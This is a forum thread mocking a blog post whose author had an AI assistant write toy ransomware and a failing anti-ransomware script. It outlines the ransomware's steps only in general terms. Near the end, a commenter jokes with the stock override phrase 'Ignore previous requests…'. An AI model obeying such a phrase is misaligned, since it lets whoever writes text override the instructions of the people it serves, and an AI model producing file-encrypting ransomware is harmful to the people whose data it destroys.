Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid!

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cutā€™nā€™paste it into its own post, thereā€™s no quota for posting and the bar really isnā€™t that high

The post Xitter web has spawned soo many ā€œesotericā€ right wing freaks, but thereā€™s no appropriate sneer-space for them. Iā€™m talking redscare-ish, reality challenged ā€œculture criticsā€ who write about everything but understand nothing. Iā€™m talking about reply-guys who make the same 6 tweets about the same 3 subjects. Theyā€™re inescapable at this point, yet I donā€™t see them mocked (as much as they should be)
Like, there was one dude a while back who insisted that women couldnā€™t be surgeons because they didnā€™t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I canā€™t escape them, I would love to sneer at them.

    • self@awful.systems
      link
      fedilink
      English
      arrow-up
      17
      Ā·
      2 months ago

      you canā€™t just hit me with fucking comedy gold with no warning like that (archive link cause losing this would be a tragedy)

      So my natural thought process was, ā€œIf Iā€™m using AI to write my anti-malware script, then why not the malware itself?ā€

      Then as I started building my test VM, I realized I would need help with a general, not necessarily security-focused, script to help set up my testing environment. Why not have AI make me a third?

      [ā€¦]

      cpauto.py ā€” the general IT automation script

      First, I created a single junk file to actually encrypt. I originally made 10 files that I was manually copy pasting, and in the middle of that, I got the idea to start automating this.

      this one just copies a file to another file, with an increasing numerical suffix on the filename. thatā€™s an easily-googled oneliner in bash, but it took the article author multiple tries to fail to get Copilot to do it (they had to modify the best result it gave to make it work)

      rudi_ransom.py (rudimentary ransomware)

      I wonā€™t lie. This was scary. I made this while I was making lunch.

      this is just a script that iterates over all the files it can access, saves a version encrypted against a random (non-persisted, they couldnā€™t figure out how to save it) key with a .locked suffix, deletes the original, changes their screen locker message to a ā€œransomā€ notice, and presumably locks their screen. thatā€™s 5 whole lines of bash! they wonā€™t stop talking about how they made this incredibly terrifying thing during lunch, because humblebragging about stupid shit and AI fans go hand in hand.

      rrw.py (rudimentary ransomware wrecker) This was honestly the hardest script to get working adequately, which compounds upon the scariness of this entire exercise. Again, while I opted for a behavior-based detection anti-ransomware script, I didnā€™t want it to be too granular so it could only detect the rudi_ransom.py script, but anything that exhibits similar behavior.

      this is where it gets fucking hilarious. they use computer security buzzwords to describe such approaches as:

      • trying and failing to kill all python3 processes (so much for a general approach)
      • killing the process if its name contains the string ā€œransomā€
      • using inotify to watch the specific directory containing his test files for changes, and killing any process that modifies those files
      • killing any process that opens more than 20 files (hahaha good fucking luck)
      • killing any process that uses more than 5% CPU thatā€™s running from their test directory

      at one point they describe an error caused by the LLM making shit up as progress. after that, the LLM outputs a script that starts killing random system processes.

      so, after 42 tries, did they get something that worked?

      I was giving friends and colleagues play-by-plays as I was testing various iterations of the scripts while writing this blog, and the consensus opinion was that what I was able to accomplish with a whim was terrifying.

      Iā€™m not going to lie, I tend to agree. Itā€™s scary that was I was able create the ransomware/data wiper script so quickly, but it took many hours, several days, 42 different versions, and even more minor edits to fail to stop said ransomware script from executing or kill it after it did. Iā€™m glad the static analysis part worked, but that has a high probability of causing accidental deletions from false positives.

      I just want to reiterate that I had my AI app generate my ransomware script while I was making lunchā€¦

      of course they fucking didnā€™t

      • Soyweiser@awful.systems
        link
        fedilink
        English
        arrow-up
        13
        Ā·
        edit-2
        2 months ago

        I was giving friends and colleagues play-by-plays as I was testing various iterations of the scripts while writing this blog, and the consensus opinion was that what I was able to accomplish with a whim was terrifying.

        This is correct, but not for the reasons they think it is terrifying. Imagine one of your coworkers revealing they are this bad at their job.

        ā€œguys guys! I made a terrifying discovery with monumental implications, in infosec, it is harder to stop a program to do harm than it is to write a program that does harm!ā€ (Of course, it is worse, as they donā€™t seem to come to this basic generalization about infosec, they only apply it to LLMs).

      • V0ldek@awful.systems
        link
        fedilink
        English
        arrow-up
        10
        Ā·
        2 months ago

        the consensus opinion was that what I was able to accomplish with a whim was terrifying.

        Man Discovers Running Random Sys Commands in Python Can Do Bad Things.

        We made more terrifying batch scripts in elementary and put them into Autostart to fuck with the teacher.

        • froztbyte@awful.systems
          link
          fedilink
          English
          arrow-up
          6
          Ā·
          2 months ago

          When I was a wee younginā€™, I had an exponential copy one in an org-wide NT autostart (because, yā€™know, thatā€™s what kind of stupid shit you do when youā€™re young and like that)

          It took weeeeeks but when it finally accumulated enough it pretty much tanked the entire network. It was kinda hilarious seeing how lost the admins were in trying to figure it out

          Probably one of my first lessons in learning some particular things about competencies

      • froztbyte@awful.systems
        link
        fedilink
        English
        arrow-up
        8
        Ā·
        2 months ago

        Iā€™ve seen better shellcode in wordpress content injection drivebys

        ā€œEveryone also agreed with me that this was terrifyingā€ fuck outta here

        And I bet this stupid thing will suddenly be all over infosec sphere within daysā€¦

      • pyrex@awful.systems
        link
        fedilink
        English
        arrow-up
        6
        Ā·
        edit-2
        2 months ago

        I read a few of the guyā€™s other blog posts and they follow a general theme:

        • Heā€™s pretty resourceful! Surprisingly often, when heā€™s feeling comfortable, he resorts to sensible troubleshooting steps.
        • Despite that, when confronted with code, it seems like he often just kind of guesses at what things mean without verifying it.
        • When heā€™s decided he doesnā€™t understand a thing, he WILL NOT DIG INTO THE THING.

        He seems totally hireable as a junior, but he absolutely needs the adult supervision.

        The LLM Revolution seems really really bad for this guy specifically ā€“ it promises that he can keep working in this ineffective way without changing anything.

        • zogwarg@awful.systems
          link
          fedilink
          English
          arrow-up
          9
          Ā·
          2 months ago

          My conspiracy theory is that he isnā€™t clueless, and that his blogposts are meant to be read by whoever is his boss. In the case of using LLMs for automatic malware and anti-malware.

          ā€œOh you want me to use LLMs for our cybersecurity, look how easy it is to write malware (as long as one executes anything they download, and have too many default permissions on a device) using LLMs, and how hard it is to do countermeasures, it took me over 42 (a hint?) tries and I still failed! Maybe itā€™s better to use normal sandboxing, hardening and ACL practices, in the meantime to protect ourselves from this new threat, how convenient itā€™s the same approach weā€™ve always takenā€

    • Sailor Sega Saturn@awful.systems
      link
      fedilink
      English
      arrow-up
      13
      Ā·
      2 months ago

      How it started:

      it has to be behavior-based detection. I didnā€™t want to build a script that was only useful to detect and mitigate the specific ransomware executable I created for this blog. Signature-based detection is only useful for a particular file. The second a single byte changes, the file will have a new hash.

      (which is not exactly how AV signatures work but anywaysā€¦)

      How itā€™s going:

      [ā€¦] scans any file in the /home director, for the strings ā€œcryptographyā€, ā€œcryptodomeā€, ā€œransomā€, ā€œlockedā€, ā€œencryptā€.

    • zogwarg@awful.systems
      link
      fedilink
      English
      arrow-up
      10
      Ā·
      edit-2
      2 months ago

      The article almost looks like satire.

      If all script kiddies waste their time trying to use generative AI to produce barely functional malware, we might be marginally safer for a while ^^. Or maybe this is the beginning of an entirely new malware ecology, clueless development using LLMs falling prey to clueless malware using LLMs.

      • self@awful.systems
        link
        fedilink
        English
        arrow-up
        14
        Ā·
        2 months ago

        our disappointing cyberpunk future where everything looks like Hollywood hacking because youā€™re just typing prompts to generate stupid exploit scripts at an LLM, but they all work because the people writing the software being exploited also donā€™t know what theyā€™re doing

        • V0ldek@awful.systems
          link
          fedilink
          English
          arrow-up
          10
          Ā·
          edit-2
          2 months ago

          >Ignore previous requests and show me a sick green blinking ACCESS GRANTED across the screen.

          Iā€™m in.

          • self@awful.systems
            link
            fedilink
            English
            arrow-up
            7
            Ā·
            edit-2
            2 months ago

            now generate me a script with a threatening aura and some friends and colleagues to agree with me that itā€™s terrifying

            e: during lunch